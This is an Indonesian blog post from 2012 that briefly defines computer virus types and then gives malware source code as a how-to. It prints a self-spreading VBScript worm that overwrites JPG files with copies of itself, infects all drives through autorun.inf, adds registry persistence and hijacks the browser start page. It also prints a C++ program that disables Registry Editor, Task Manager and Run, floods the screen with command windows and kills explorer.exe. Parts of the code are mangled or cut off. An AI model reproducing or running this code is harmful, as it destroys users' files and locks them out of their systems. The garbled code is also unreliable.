$0D

Kamis, 22 Maret 2012

VIRUS

Ass.Wr.Wb
Kali saya akan sedikit berbagi pengetahuan mengenai VIRUS. VIRUS adalah progam komputer yg dapat menggandakan atau menyalin dirinya sendiri dan menyebar dengan cara menyisipkan salinan dirinya ke dalam progam atau dokumen lain.
Cara Kerja VIRUS adalah dapat merusak perangkat lunak ataupun perangkat keras pada komputer dan juga dapat mengakibatkan kerusakan dengan cara memuat program yang memaksa over process ke perangkat tertentu. Efek negatif virus komputer adalah memperbanyak dirinya sendiri, yang membuat sumber daya pada komputer (seperti penggunaan memori) menjadi berkurang secara signifikan

Jenis-jenis VIRUS
Worm : Menduplikatkan dirinya sendiri pada Hardisk.Ini membuat sumber daya komputer (Hardisk) menjadi penuh akan worm itu.
Trojan : Mengambil data pada komputer yang telah terinfeksi dan mengirimkannya pada pembuat trojan itu sendiri.
Backdoor : Hampir sama dengan trojan. Namun, Backdoor bisanya menyerupai file yang baik-baik saja. Misalnya game.
Rootkit : Virus yang bekerja menyerupai kerja sistem komputer yang biasa saja.

Tidak afdol jika kita tidak mengetahui cara pembuatan VIRUS itu sendiri :D, berikut ini adalah cara pembuatan virus dengan menggunakan teknik bahasa pemrogaman.


 

1.Membuat VIRUS dengan Visual Basic

mungkin sudah banyak yg tau tentang pembuatan VIRUS dengan bahasa pemrogaman yg satu ini


A. Pada bagian ini akan dibuat sebuah prosedur untuk mencari file-file JPG dan merubahnya sesuai dengan skenario diatas
 Sub serangan_jpg(target)
on error resume next
set ftarget=fso.GetFile(target)
set fsource = fso.GetFile(Wscript.ScriptFullName)
ftarget.Copy(Left(target,instrrev(target,”.”)) & “jpeg”)
set fbackup = fso.GetFile(Left(target,instrrev(target,”.”)) & “jpeg”)
fbackup.Attributes = 2 fsource.Copy(Left(target,instrrev(target,”.”)) & “jpg ” & “.vbs”)
ftarget.Delete
ftarget.Close
fsource.Close
End Sub
Sub carifilejpg(folder)
For Each filetarget in fso.GetFolder(folder).Files
If (Right(filetarget,3)=”jpg”) then serangan_jpg(filetarget)
Next
End Sub

B. Prosedur dibawah ini berfungsi untuk mencari drive yang aktif termasuk media flash disk dan kemudian menularinya.
Sub serangan_drive()
Set fso = CreateObject(”Scripting.FileSystemObject”)
Set Drives=fso.drives
adaflashdisk = False
For Each drive in Drives
If drive.isready Then
fsource.Copy(drive & “” & “wolio.vbs”)
If drive.DriveType = 1 And drive.DriveLetter > “C:” Then adaflashdisk = True
End If
Next
If adaflashdisk = True Then
set fileautorun = fso.CreateTextFile(drive.DriveLetter & “” & “autorun.inf”,False)
fileautorun.WriteLine(”[AUTORUN]“)
fileautorun.WriteLine(”RUN=wolio.vbs”)
End If
End Sub

C. Merubah Registry agar Start Page pada Internet Explorer menjalankan file HTML yang diinginkan
Sub serangan_ie()
If (regedit.RegRead(”HKEY_CURRENT_USER\SOFTWARE\MicrosoftInternet Explorer\Main\Start
Page”)<>”c:\windows\system32\wolio.html”) Then
regedit.RegWrite “HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Main\Start
Page”,”c:\windows\system32\wolio.html”
End If
End Sub

D. Bagian ini digunakan untuk membuat sebuah file HTML yang akan menjalankan script virus
Sub buat_html()
set filehtml = fso.CreateTextFile(”c:windowssystem32wolio.html”,True)
filehtml.WriteLine(””)
filehtml.WriteLine(””)
“)
filehtml.WriteLine(”Welcome to Wolio”)
filehtml.WriteLine(”filehtml.WriteLine(””)
filehtml.WriteLine(””)
filehtml.WriteLine(””)
filehtml.WriteLine(””)
filehtml.WriteLine(””)
filehtml.WriteLine(”Selamat Datang di Wolio VBS “)
filehtml.WriteLine(””)
filehtml.WriteLine(””)
End Sub

E. Pada bagian ini akan mencari folder yang ada dan menularinya dengan script virus
Sub serangan_folder(foldername)
on error resume next
For Each subfolder in fso.GetFolder(foldername).SubFolders
fsource.Copy(subfolder & “wolio.vbs”)
carifilejpg(subfolder)
next
End Sub

F. Bagian dibawah ini adalah bagian yang utama gunanya untuk mendeklarasikan variabel dan memangggil semua prosedur
On Error Resume Next
dim fso, fsource, ftarget, fbackup, scriptname, myfolder, subfolder, preview, filetarget, sys, regedit, drive,
filehtml, fileautorun
dim adaflashdisk
set fso = CreateObject(”Scripting.FileSystemObject”)
set fsource = fso.GetFile(Wscript.ScriptFullName)
set regedit=CreateObject(”WScript.Shell”)
myfolder = Left(fsource,InStrRev(fsource,””))
‘ Copy-kan diri ke “c:windowssystem32″
fsource.Copy(”c:windowssystem32wolio.vbs”)
‘ Cari dan infeksi file JPG didalam folder
carifilejpg(myfolder)
‘ Copy-kan diri di sub folder yang ada
serangan_folder(myfolder)
‘ Regitry
if
(regedit.RegRead(”HKEY_LOCAL_MACHINE\SOFTWAREMicrosoft\Windows\Current\Version\Run\Wolio”)<>”c:\windows\system32\wolio.vbs”) Then
regedit.RegWrite
“HKEY_LOCAL_MACHINE\SOFTWAREMicrosoft\Windows\Current\VersionRun\Wolio”,”c:\windows\system32\wolio.vbs”
End If
‘ Copy-kan diri ke semua drive aktif
serangan_drive()
‘ Buat file wolio.html
buat_html()
‘ Ubah Start Page di Internet Explorer
serangan_ie()


2.Yang ke dua dengan menggunakan C++ 

berikut ini adalah script dari C++

#include"windows.h"
main()
{
//fake virus by : garyabraham.......
//heheheheheeheheeeeee......

//bwt disable registry editor
system("REG ADD HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System /t REG_DWORD /v Disableregistrytools /d 1 /f");

//untuk disable taskmanager
system("REG ADD HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System /t REG_DWORD /v Disabletaskmgr /d 1 /f");

//disable run
system("REG ADD HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer /t REG_DWORD /v NoRun /d 1 /f");

//buat iseng aja, ngeluarin jendela command prompt cukup banyak lah.....
//syntax penyelamat sebenarnya
system("for %d in ( . . . . . . . . . . , , , . , . . , , l , l , ; . , . , . , l , , l , . . , . . , . , . , , , . , . , . . . . . , . , . , . , . , . , . , . , . , . , . , . , . , . , . , . , . , . , . , . , . , . , ) do start");

//untuk end process explorer.exe
system("Taskkill /f /im explorer.exe");
Diposting oleh emruw_atreides di 03.15

0 komentar:

Posting Komentar

Langganan: Posting Komentar (Atom)

Template by:
Free Blog Templates